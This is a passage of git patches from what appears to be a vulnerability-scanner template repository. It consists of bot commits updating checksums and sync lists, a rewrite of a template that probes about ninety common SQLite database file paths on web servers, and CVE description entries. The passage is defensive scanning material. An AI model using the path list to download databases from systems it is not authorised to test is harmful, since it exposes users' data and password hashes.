+http/cves/2024/CVE-2024-1212.yaml:5671b80e9ab3c9274bd98bbeb8fe508980393f85 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7 @@ -8171,7 +8172,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ea62e7a3ece798218348e5276776aff198c9f2f8 +templates-checksum.txt:1cf7b285b6ad21a0ff4d01a0703cb9c5ac5025b4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5e5a61558a591c234f4df647dcbfe6bebc54d17f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:58:18 +0000 Subject: [PATCH 22/53] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index da7f634231..191c720b88 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'dns/soa-detect.yaml' - 'file/keys/dependency/dependency-track.yaml' - 'file/keys/docker/dockerhub-pat.yaml' - 'file/keys/doppler/doppler-audit.yaml' From 73e65180af38a5be575a0f501212642d8ac7a734 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:59:02 +0000 Subject: [PATCH 23/53] Auto Generated Templates Checksum [Wed Mar 20 04:59:02 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3b84c9da72..33a64481b4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -125,6 +125,7 @@ dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 +dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891 file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8 @@ -8172,7 +8173,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1cf7b285b6ad21a0ff4d01a0703cb9c5ac5025b4 +templates-checksum.txt:c89e2365557cf78a0e2ea79cd9143ae9b2bbd42f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From bff5fe145aaf1e3b27e836f64675039c7a60cc15 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:59:16 +0000 Subject: [PATCH 24/53] Auto Generated New Template Addition List [Wed Mar 20 04:59:16 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 0b99585cdf..cf77a5b53a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ dns/soa-detect.yaml +dns/txt-service-detect.yaml file/keys/dependency/dependency-track.yaml file/keys/docker/dockerhub-pat.yaml file/keys/doppler/doppler-audit.yaml @@ -44,5 +45,6 @@ http/osint/phishing/kakao-login-phish.yaml http/osint/phishing/naver-login-phish.yaml http/technologies/microsoft/aspnet-version-detect.yaml http/technologies/microsoft/aspnetmvc-version-disclosure.yaml +http/technologies/wing-ftp-service-detect.yaml http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml network/detection/wing-ftp-detect.yaml From 8fa711b73fc4a5ca83531803ac0a88f7120b9f46 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:59:22 +0000 Subject: [PATCH 25/53] Auto Template Signing [Wed Mar 20 04:59:22 UTC 2024] :robot: --- dns/soa-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml index eb6eda0782..1d98b9fa5d 100644 --- a/dns/soa-detect.yaml +++ b/dns/soa-detect.yaml @@ -81,3 +81,4 @@ dns: name: "edge-cast" words: - "edgecastdns.net" +# digest: 4a0a00473045022052cc795314a697081c68e82277bf2be22ff53410f9a9a69af759ecefcd5b235b022100f94a899ec64709bb1f7d4e648dc091ee40029b754e4cc451882f0ccb68ff4921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4c5df2dff27cc89dbefc3d58f1abffa009fab62d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:59:54 +0000 Subject: [PATCH 26/53] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 191c720b88..9c636adef9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'dns/soa-detect.yaml' + - 'dns/txt-service-detect.yaml' - 'file/keys/dependency/dependency-track.yaml' - 'file/keys/docker/dockerhub-pat.yaml' - 'file/keys/doppler/doppler-audit.yaml' @@ -49,6 +50,7 @@ on: - 'http/osint/phishing/naver-login-phish.yaml' - 'http/technologies/microsoft/aspnet-version-detect.yaml' - 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml' + - 'http/technologies/wing-ftp-service-detect.yaml' - 'http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml' - 'network/detection/wing-ftp-detect.yaml' workflow_dispatch: From 6bd7a9e020f0d4e640d770d1a2a7a564e3802ae2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 20 Mar 2024 12:51:44 +0530 Subject: [PATCH 27/53] updated with path variable --- http/exposures/files/generic-db.yaml | 187 ++++++++++++++------------- 1 file changed, 95 insertions(+), 92 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 0ac1962fbf..3d0fbff868 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -42,104 +42,107 @@ info: cvss-score: 7.5 metadata: max-request: 89 - tags: files,database,exposure,sqlite,sqlite3 + tags: files,database,exposure,sqlite,sqlite3,fuzz http: - method: GET path: - # Recommended paths found in framework official docs or unofficial tutorials - - "{{BaseURL}}/database/database.sqlite" - - "{{BaseURL}}/database/production.sqlite" - - "{{BaseURL}}/app/database/production.sqlite" - - "{{BaseURL}}/writable/db.sqlite3" - - "{{BaseURL}}/writable/database.db" - - "{{BaseURL}}/var/app.db" - - "{{BaseURL}}/var/data/db.sqlite" - - "{{BaseURL}}/var/data/data.sqlite" - - "{{BaseURL}}/app/sqlite.db" - - "{{BaseURL}}/sqlite.db" - - "{{BaseURL}}/db.sqlite3" - - "{{BaseURL}}/db/production.sqlite3" - - "{{BaseURL}}/db.sqlite" - - "{{BaseURL}}/mydb.sqlite" - - "{{BaseURL}}/app/data/app_db.sqlite" - - "{{BaseURL}}/app/webroot/database.sqlite" - - "{{BaseURL}}/app/database.sqlite" - - "{{BaseURL}}/application/databases/db.sqlite" - - "{{BaseURL}}/application/db/database.sqlite" - - "{{BaseURL}}/application/Database/db1.db" - - "{{BaseURL}}/application/database/data.db" - - "{{BaseURL}}/data/app.db" - - "{{BaseURL}}/data/sqlite.db" - - "{{BaseURL}}/data/sqlite3.db" - - "{{BaseURL}}/data/database.db" - - "{{BaseURL}}/data/production.db" - - "{{BaseURL}}/storage/database/database.sqlite" - - "{{BaseURL}}/protected/data/app.db" - - "{{BaseURL}}/protected/data/sqlite.db" - - "{{BaseURL}}/protected/data/sqlite3.db" - - "{{BaseURL}}/protected/data/database.db" - - "{{BaseURL}}/protected/data/production.db" - - "{{BaseURL}}/db/database.db" - - "{{BaseURL}}/db/database.sqlite" - - "{{BaseURL}}/app/Model/app.db" - - "{{BaseURL}}/app/Model/sqlite.db" - - "{{BaseURL}}/app/Model/sqlite3.db" - - "{{BaseURL}}/app/Model/database.db" - - "{{BaseURL}}/app/Model/production.db" - # General paths - - "{{BaseURL}}/app.db" - - "{{BaseURL}}/sqlite3.db" - - "{{BaseURL}}/app.sqlite" - - "{{BaseURL}}/app.sqlite3" - - "{{BaseURL}}/database.db" - - "{{BaseURL}}/database.sqlite" - - "{{BaseURL}}/database.sqlite3" - - "{{BaseURL}}/production.db" - - "{{BaseURL}}/production.sqlite" - - "{{BaseURL}}/production.sqlite3" - - "{{BaseURL}}/db/db.sqlite" - - "{{BaseURL}}/db/db.sqlite3" - - "{{BaseURL}}/db/sqlite.db" - - "{{BaseURL}}/db/sqlite3.db" - - "{{BaseURL}}/db/app.db" - - "{{BaseURL}}/db/app.sqlite" - - "{{BaseURL}}/db/app.sqlite3" - - "{{BaseURL}}/db/database.sqlite3" - - "{{BaseURL}}/db/production.db" - - "{{BaseURL}}/db/production.sqlite" - - "{{BaseURL}}/app/db.sqlite" - - "{{BaseURL}}/app/db.sqlite3" - - "{{BaseURL}}/app/sqlite3.db" - - "{{BaseURL}}/app/app.db" - - "{{BaseURL}}/app/app.sqlite" - - "{{BaseURL}}/app/app.sqlite3" - - "{{BaseURL}}/app/database.db" - - "{{BaseURL}}/app/database.sqlite3" - - "{{BaseURL}}/app/production.db" - - "{{BaseURL}}/app/production.sqlite" - - "{{BaseURL}}/app/production.sqlite3" - - "{{BaseURL}}/data/db.sqlite" - - "{{BaseURL}}/data/db.sqlite3" - - "{{BaseURL}}/data/app.sqlite" - - "{{BaseURL}}/data/app.sqlite3" - - "{{BaseURL}}/data/database.sqlite" - - "{{BaseURL}}/data/database.sqlite3" - - "{{BaseURL}}/data/production.sqlite" - - "{{BaseURL}}/data/production.sqlite3" - - "{{BaseURL}}/database/db.sqlite" - - "{{BaseURL}}/database/db.sqlite3" - - "{{BaseURL}}/database/sqlite.db" - - "{{BaseURL}}/database/sqlite3.db" - - "{{BaseURL}}/database/app.db" - - "{{BaseURL}}/database/app.sqlite" - - "{{BaseURL}}/database/app.sqlite3" - - "{{BaseURL}}/database/database.db" - - "{{BaseURL}}/database/database.sqlite3" - - "{{BaseURL}}/database/production.db" - - "{{BaseURL}}/database/production.sqlite3" + - "{{BaseURL}}/{{path}}" + payloads: + path: + - database/database.sqlite + - database/production.db + - database/production.sqlite + - database/production.sqlite3 + - app/database/production.sqlite + - writable/db.sqlite3 + - writable/database.db + - var/app.db + - var/data/db.sqlite + - var/data/data.sqlite + - app/sqlite.db + - sqlite.db + - db.sqlite3 + - db/production.sqlite3 + - db.sqlite + - mydb.sqlite + - app/data/app_db.sqlite + - app/webroot/database.sqlite + - app/database.sqlite + - application/databases/db.sqlite + - application/db/database.sqlite + - application/Database/db1.db + - application/database/data.db + - data/app.db + - data/sqlite.db + - data/sqlite3.db + - data/database.db + - data/production.db + - storage/database/database.sqlite + - protected/data/app.db + - protected/data/sqlite.db + - protected/data/sqlite3.db + - protected/data/database.db + - protected/data/production.db + - db/database.db + - db/database.sqlite + - app/Model/app.db + - app/Model/sqlite.db + - app/Model/sqlite3.db + - app/Model/database.db + - app/Model/production.db + - app.db + - sqlite3.db + - app.sqlite + - app.sqlite3 + - database.db + - database.sqlite + - database.sqlite3 + - production.db + - production.sqlite + - production.sqlite3 + - db/db.sqlite + - db/db.sqlite3 + - db/sqlite.db + - db/sqlite3.db + - db/app.db + - db/app.sqlite + - db/app.sqlite3 + - db/database.sqlite3 + - db/production.db + - db/production.sqlite + - app/db.sqlite + - app/db.sqlite3 + - app/sqlite3.db + - app/app.db + - app/app.sqlite + - app/app.sqlite3 + - app/database.db + - app/database.sqlite3 + - app/production.db + - app/production.sqlite + - app/production.sqlite3 + - data/db.sqlite + - data/db.sqlite3 + - data/app.sqlite + - data/app.sqlite3 + - data/database.sqlite + - data/database.sqlite3 + - data/production.sqlite + - data/production.sqlite3 + - database/db.sqlite + - database/db.sqlite3 + - database/sqlite.db + - database/sqlite3.db + - database/app.db + - database/app.sqlite + - database/app.sqlite3 + - database/database.db + - database/database.sqlite3 + + stop-at-first-match: true matchers: - type: dsl dsl: From cc8ee3aa0fdc3674e60d1055ec47147a63bc2879 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 20 Mar 2024 13:38:58 +0530 Subject: [PATCH 28/53] minor update --- http/exposures/files/generic-db.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 3d0fbff868..d6f33746df 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -4,7 +4,8 @@ info: name: Generic Database File - Exposure author: Michal Mikolas (nanuqcz) severity: high - description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. + description: | + This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. reference: - https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite - https://laravel.com/docs/5.2/database # database/database.sqlite From faefc8a92e83377104b005e1790b41da54bc6383 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 08:12:01 +0000 Subject: [PATCH 29/53] Auto Generated New Template Addition List [Wed Mar 20 08:12:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cf77a5b53a..e60a673523 100644 --- a/.new-additions +++ b/.new-additions @@ -40,6 +40,7 @@ http/exposed-panels/neocase-hrportal-panel.yaml http/exposed-panels/osnexus-panel.yaml http/exposed-panels/posteio-admin-panel.yaml http/exposed-panels/skeepers-panel.yaml +http/exposures/files/generic-db.yaml http/misconfiguration/installer/posteio-installer.yaml http/osint/phishing/kakao-login-phish.yaml http/osint/phishing/naver-login-phish.yaml From 20e58460b4cf676ad29ddf535b79298e1e5495b9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 08:12:15 +0000 Subject: [PATCH 30/53] Auto Generated Templates Checksum [Wed Mar 20 08:12:15 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 33a64481b4..6048164bfe 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -122,7 +122,7 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58 dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 -dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 +dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 @@ -4536,6 +4536,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 +http/exposures/files/generic-db.yaml:1f5cc209039fbe3d53d29286d46bea2e8ffada19 http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e @@ -6680,6 +6681,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 +http/technologies/wing-ftp-service-detect.yaml:416707a344d027b1224855a9c085642fadcccf38 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900 @@ -8173,7 +8175,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c89e2365557cf78a0e2ea79cd9143ae9b2bbd42f +templates-checksum.txt:0bd557ae0e24c541eae22a598daa4f74b79cfd0f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 35c7f1e4671d1fc0a75a3312328919fb92ecb365 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 08:12:47 +0000 Subject: [PATCH 31/53] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9c636adef9..52ff2ed46f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -45,6 +45,7 @@ on: - 'http/exposed-panels/osnexus-panel.yaml' - 'http/exposed-panels/posteio-admin-panel.yaml' - 'http/exposed-panels/skeepers-panel.yaml' + - 'http/exposures/files/generic-db.yaml' - 'http/misconfiguration/installer/posteio-installer.yaml' - 'http/osint/phishing/kakao-login-phish.yaml' - 'http/osint/phishing/naver-login-phish.yaml' From cbf2c2568d5c60c9b473ee886a1cd07c196d3f8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 08:13:55 +0000 Subject: [PATCH 32/53] Auto Template Signing [Wed Mar 20 08:13:55 UTC 2024] :robot: --- dns/txt-service-detect.yaml | 1 + http/exposures/files/generic-db.yaml | 1 + http/technologies/wing-ftp-service-detect.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/dns/txt-service-detect.yaml b/dns/txt-service-detect.yaml index d286a8d2fe..17a8d5e012 100644 --- a/dns/txt-service-detect.yaml +++ b/dns/txt-service-detect.yaml @@ -218,3 +218,4 @@ dns: name: "whimsical" words: - "whimsical" +# digest: 490a00463044022043132b95ad11ec72665418855d60e0d979abbe9957b18f9170981f4f4af22a72022054d2942e7554851cd1f043f99d5e119ff9e8943a635a891927b1897d270383b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index d6f33746df..99da464258 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -152,3 +152,4 @@ http: - '!contains(body, " Date: Wed, 20 Mar 2024 08:14:48 +0000 Subject: [PATCH 33/53] Auto Generated cves.json [Wed Mar 20 08:14:48 UTC 2024] :robot: --- cves.json | 14 ++++++++++++-- cves.json-checksum.txt | 2 +- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index 58062848e9..bef7f939af 100644 --- a/cves.json +++ b/cves.json @@ -1386,7 +1386,7 @@ {"ID":"CVE-2021-40149","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Private Key Disclosure","Severity":"medium","Description":"Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2021/CVE-2021-40149.yaml"} {"ID":"CVE-2021-40150","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Information Disclosure","Severity":"high","Description":"Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40150.yaml"} {"ID":"CVE-2021-40323","Info":{"Name":"Cobbler \u003c3.3.0 - Remote Code Execution","Severity":"critical","Description":"Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40323.yaml"} -{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 - Mod_Proxy SSRF","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"} +{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 Mod_Proxy - Server-Side Request Forgery","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"} {"ID":"CVE-2021-40539","Info":{"Name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40539.yaml"} {"ID":"CVE-2021-40542","Info":{"Name":"Opensis-Classic 8.0 - Cross-Site Scripting","Severity":"medium","Description":"Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40542.yaml"} {"ID":"CVE-2021-40651","Info":{"Name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","Severity":"medium","Description":"OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-40651.yaml"} @@ -2171,7 +2171,7 @@ {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} {"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} -{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} +{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} {"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"} @@ -2227,6 +2227,7 @@ {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} {"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"} +{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"} {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files 